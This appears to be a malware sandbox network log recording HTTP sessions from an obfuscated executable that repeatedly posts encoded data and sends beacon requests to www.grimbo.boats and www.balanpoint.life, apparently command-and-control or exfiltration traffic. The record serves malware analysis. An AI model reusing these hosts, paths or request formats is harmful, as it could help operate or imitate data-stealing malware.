Dec 11, 2024 04:51:51.917275906 CET	1236	IN	Data Raw: 45 76 34 32 4b 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 Data Ascii: Ev42Kw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.epayassist.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.epayassist.net/px.js?ch=2"></script><script t
Dec 11, 2024 04:51:51.917287111 CET	256	IN	Data Raw: 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0d 0a 20 Data Ascii: "NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-wid
Dec 11, 2024 04:51:51.962696075 CET	869	IN	Data Raw: 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a Data Ascii: cale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'sr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49936	172.67.182.198	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:57.503652096 CET	803	OUT	POST /mjln/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.grimbo.boats/mjln/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 79 4f 32 38 4c 36 53 49 59 54 2f 4a 31 35 37 63 55 65 32 4e 30 5a 44 62 4d 4e 42 31 63 76 2b 6c 32 61 74 2f 4e 59 4b 69 7a 46 38 2f 68 43 4c 61 66 4c 2b 67 53 6f 53 36 47 52 35 4a 75 45 70 31 31 64 57 2b 45 62 72 69 6f 52 45 72 7a 51 45 67 72 73 77 53 74 6e 77 6e 4b 52 6e 61 56 36 48 39 58 6d 62 58 6d 4b 67 6a 78 71 72 55 62 4c 4d 63 78 6e 30 6b 47 65 38 5a 58 4f 42 72 76 6a 62 76 76 63 68 77 7a 78 6e 6a 6a 75 2f 55 2f 49 75 6c 75 75 61 76 57 66 64 5a 52 41 75 44 74 55 51 4f 74 51 35 36 6e 4f 69 6f 34 69 66 4c 52 4c 30 4f 68 64 2f 63 6b 51 3d 3d Data Ascii: gnlxDxt=rT1WT6jygwobyO28L6SIYT/J157cUe2N0ZDbMNB1cv+l2at/NYKizF8/hCLafL+gSoS6GR5JuEp11dW+EbrioRErzQEgrswStnwnKRnaV6H9XmbXmKgjxqrUbLMcxn0kGe8ZXOBrvjbvvchwzxnjju/U/IuluuavWfdZRAuDtUQOtQ56nOio4ifLRL0Ohd/ckQ==
Dec 11, 2024 04:51:58.787681103 CET	1064	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:58 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2ZDdT9xQBNKZ6YeB3NBLmZAV4Ok2M99AVA6pozXul20iPi8hizs7e1S%2BmP9%2FMjHezcaqwj%2BbhARk8hu6idLPpLi2DlaJUL1LReeIR%2FzZ5BQEf5ICUhxlFgVVWKTl%2BWxHjOS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0284ee2c730fab-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49942	172.67.182.198	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:00.167243004 CET	823	OUT	POST /mjln/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.grimbo.boats/mjln/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 7a 75 47 38 4e 64 47 49 65 7a 2f 4b 70 70 37 63 61 2b 33 4b 30 5a 50 62 4d 4d 46 66 62 64 71 6c 32 34 31 2f 58 61 75 69 77 46 38 2f 35 53 4c 66 41 62 2b 72 53 6f 57 59 47 51 46 4a 75 48 56 31 31 63 6d 2b 45 49 44 74 6f 42 45 74 79 67 45 69 31 63 77 53 74 6e 77 6e 4b 51 48 77 56 2b 72 39 4c 46 7a 58 6d 70 34 67 34 4b 72 58 53 72 4d 63 31 6e 30 67 47 65 39 38 58 50 64 42 76 6c 66 76 76 5a 4e 77 7a 6c 54 67 6f 75 2b 52 67 59 76 7a 71 65 2f 2f 59 63 77 76 54 42 44 73 69 30 55 78 6c 32 30 67 32 2f 44 2f 71 69 37 34 4d 4d 39 36 73 65 43 56 2f 57 42 50 75 32 77 73 61 32 6f 73 77 46 41 59 45 5a 37 72 78 67 6b 3d Data Ascii: gnlxDxt=rT1WT6jygwobzuG8NdGIez/Kpp7ca+3K0ZPbMMFfbdql241/XauiwF8/5SLfAb+rSoWYGQFJuHV11cm+EIDtoBEtygEi1cwStnwnKQHwV+r9LFzXmp4g4KrXSrMc1n0gGe98XPdBvlfvvZNwzlTgou+RgYvzqe//YcwvTBDsi0Uxl20g2/D/qi74MM96seCV/WBPu2wsa2oswFAYEZ7rxgk=
Dec 11, 2024 04:52:01.447227955 CET	1061	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:01 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLZCTO1%2FGPsTsbDggEnIgWm026WDrs4jizTyKqBSl6M4GSXs5MYh7jthEvFr6Wo4f2D92IdvoICqZYiL2phRfYPzNwfcUOcOGsGb29hcXfnLRA1lF4Si9Ntaand%2FHu93MA%2BK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0284fecaa7422f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49948	172.67.182.198	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:02.823101044 CET	10905	OUT	POST /mjln/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.grimbo.boats/mjln/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 7a 75 47 38 4e 64 47 49 65 7a 2f 4b 70 70 37 63 61 2b 33 4b 30 5a 50 62 4d 4d 46 66 62 64 79 6c 33 4e 70 2f 55 37 75 69 2f 6c 38 2f 6e 43 4c 65 41 62 2b 4d 53 70 79 63 47 51 49 2b 75 42 5a 31 30 2b 75 2b 55 70 44 74 69 42 45 74 33 51 45 6a 72 73 78 51 74 6e 67 6a 4b 52 72 77 56 2b 72 39 4c 44 50 58 68 36 67 67 2b 4b 72 55 62 4c 4e 54 78 6e 30 45 47 66 55 42 58 50 70 37 76 56 2f 76 76 35 64 77 32 57 37 67 72 4f 2b 54 6a 59 76 37 71 65 43 6c 59 64 63 5a 54 42 47 78 69 32 49 78 6c 33 5a 30 75 72 44 68 6f 6a 44 78 58 50 41 59 73 4d 69 70 6d 45 59 79 68 48 73 34 45 53 30 50 2b 6d 78 50 47 73 76 73 7a 55 71 49 36 50 51 2b 63 36 6c 30 6b 77 66 78 6c 6e 45 35 2b 7a 70 62 73 44 4c 68 70 79 42 58 50 57 35 6a 44 30 65 37 7a 72 76 38 73 37 69 38 46 51 58 78 57 75 70 77 54 4a 69 2b 5a 30 67 4d 63 62 54 72 54 71 54 38 50 78 34 6c 39 6e 33 68 35 37 30 51 35 48 68 6e 65 7a 68 6f 66 49 77 49 62 54 65 72 78 46 64 46 4b 34 4b 74 30 6d 48 48 37 77 77 48 67 4e [TRUNCATED] Data Ascii: gnlxDxt=rT1WT6jygwobzuG8NdGIez/Kpp7ca+3K0ZPbMMFfbdyl3Np/U7ui/l8/nCLeAb+MSpycGQI+uBZ10+u+UpDtiBEt3QEjrsxQtngjKRrwV+r9LDPXh6gg+KrUbLNTxn0EGfUBXPp7vV/vv5dw2W7grO+TjYv7qeClYdcZTBGxi2Ixl3Z0urDhojDxXPAYsMipmEYyhHs4ES0P+mxPGsvszUqI6PQ+c6l0kwfxlnE5+zpbsDLhpyBXPW5jD0e7zrv8s7i8FQXxWupwTJi+Z0gMcbTrTqT8Px4l9n3h570Q5HhnezhofIwIbTerxFdFK4Kt0mHH7wwHgN5WA5BUPdui6oGQBSYACTesqg/FFOft77b5pif5Jmd1Ul5vPmW8XaKF3AUKMj5h9WX/JdxHy1rZhSsUuy95w8tczBjgGIkyPYTs8ysZWXGqV3GjFQmbg/8MHgn577i3KqkSzd0ntYSL8iV5edMErJMP/I9fjQOSp2/e8wofiYv+25I57PY6kaRyjLxBhoV5JT2BnhCfxtPxAro60izr5eMFT4kw8EeBoonLK4AbFM3pRNZdaXX709kQH5yR13f8qv+dYCHhjtuCdAZjLL+YClwIZQZk9sZ9xNJRgC4qCtTd3fP926XQdFuqEd2Y6+KAu8aEoxFJmMaTyk5GDGOlbuq7jJP3+c7fmM1BYHEkn0aiqZLt87GSw9CLa2gcaZtI8Kgg9kzroMJw/PWwUjc7r658EGY1+SgIpaRKRRG7395sBCQS3/NatzVtNNPd2y6ig2OuYUAdR8FX8O82EHiW6rn7OPY3B4Jvlt/r0KGauzXQmamdotaqkjZeXzAk0CPJUxEG8biyxc8/sOuSx7UHFDxsvtG4cZvP4IxvyPhwn5/bnoJkEMKDNbP7zeEe9mLwBpelzYOzTNipcp3bQpHkHNOPPEibXT9sjA435drPh1nBx/Y343jCwXOkiMBuSbmBnhqhuNpwQZ5OIOV33lmdsDQbU2RIuuFRwKTq [TRUNCATED]
Dec 11, 2024 04:52:04.121299028 CET	1061	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:03 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvPRlmBgPLEM4X05GOPeXmJB528UUzPlLeXzsHcQO57w%2B3eCLGrmGuCt6iOy3jR8UWrqpVtBCJVtekibX93SMeQAK3RDFPkXRw0m6GoBpBCjSRPdlh6eioCrh6FcvO%2B2CCVg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f02850f6da41a03-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1889&rtt_var=944&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49954	172.67.182.198	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:05.473501921 CET	538	OUT	GET /mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.grimbo.boats Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:52:06.803153992 CET	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzjY4Tgh6Iiw4Ubvvj%2BFPmFos4pA4IaVciSoI%2Fk2GRhTUc1%2Fa%2FeAw7FM83gPTd5npYeQ7dxHlHleRJ8v5Jna0v%2FaFMtxC69Wob1a6YiW4SkSe2ERVQZx%2FWfYnMFuckHVmx0x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f02851ffbec7d0c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49975	209.74.79.40	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:12.701015949 CET	812	OUT	POST /0cbv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.balanpoint.life Origin: http://www.balanpoint.life Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.balanpoint.life/0cbv/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 6c 45 56 41 45 70 42 53 57 46 56 4e 33 33 39 39 2f 64 58 4e 61 62 38 45 70 54 76 4f 62 6e 73 64 41 46 39 6d 34 6d 38 45 4b 49 49 53 50 6f 34 44 55 36 62 69 32 46 42 63 66 37 4e 78 4e 67 52 76 56 35 68 50 68 31 4f 4a 36 62 67 31 44 30 51 41 72 76 44 7a 67 77 50 38 6b 33 50 58 68 58 75 73 2f 33 48 6f 6c 43 69 4b 66 66 56 7a 4b 33 30 31 62 6c 4b 32 73 35 42 74 38 73 49 30 6d 67 55 79 44 55 72 4c 61 6d 58 4d 38 4a 42 58 34 64 4c 70 76 62 39 59 6c 35 62 54 4f 79 62 6b 6d 6a 35 49 55 65 78 62 73 79 38 41 35 59 68 6c 32 64 79 48 72 43 79 52 77 3d 3d Data Ascii: gnlxDxt=4nKRhwrjm+Zo6lEVAEpBSWFVN3399/dXNab8EpTvObnsdAF9m4m8EKIISPo4DU6bi2FBcf7NxNgRvV5hPh1OJ6bg1D0QArvDzgwP8k3PXhXus/3HolCiKffVzK301blK2s5Bt8sI0mgUyDUrLamXM8JBX4dLpvb9Yl5bTOybkmj5IUexbsy8A5Yhl2dyHrCyRw==
Dec 11, 2024 04:52:13.920367002 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:13 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49981	209.74.79.40	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:15.370254040 CET	832	OUT	POST /0cbv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.balanpoint.life Origin: http://www.balanpoint.life Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.balanpoint.life/0cbv/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 46 30 56 42 6a 56 42 44 6d 46 55 52 48 33 39 30 66 64 54 4e 61 66 38 45 72 2b 30 4f 4f 50 73 54 41 56 39 6e 35 6d 38 4a 71 49 49 61 76 6f 48 48 55 36 45 69 32 35 2f 63 61 44 4e 78 4e 30 52 76 51 46 68 50 57 4a 42 4c 71 62 75 30 7a 30 53 4e 4c 76 44 7a 67 77 50 38 6c 57 59 58 68 50 75 76 4c 7a 48 71 45 43 74 44 2f 66 55 30 4b 33 30 6a 72 6c 4f 32 73 34 6b 74 34 4e 76 30 6a 6b 55 79 43 6b 72 4b 4c 6d 59 58 73 4a 50 49 6f 63 4b 70 4e 65 77 56 30 4e 52 5a 4e 4b 39 73 56 62 61 41 79 54 72 4b 64 54 72 53 35 38 53 34 78 55 47 4b 6f 2f 37 4b 7a 51 6e 58 56 47 32 64 61 6f 6a 76 51 75 77 41 31 52 6e 74 61 4d 3d Data Ascii: gnlxDxt=4nKRhwrjm+Zo6F0VBjVBDmFURH390fdTNaf8Er+0OOPsTAV9n5m8JqIIavoHHU6Ei25/caDNxN0RvQFhPWJBLqbu0z0SNLvDzgwP8lWYXhPuvLzHqECtD/fU0K30jrlO2s4kt4Nv0jkUyCkrKLmYXsJPIocKpNewV0NRZNK9sVbaAyTrKdTrS58S4xUGKo/7KzQnXVG2daojvQuwA1RntaM=
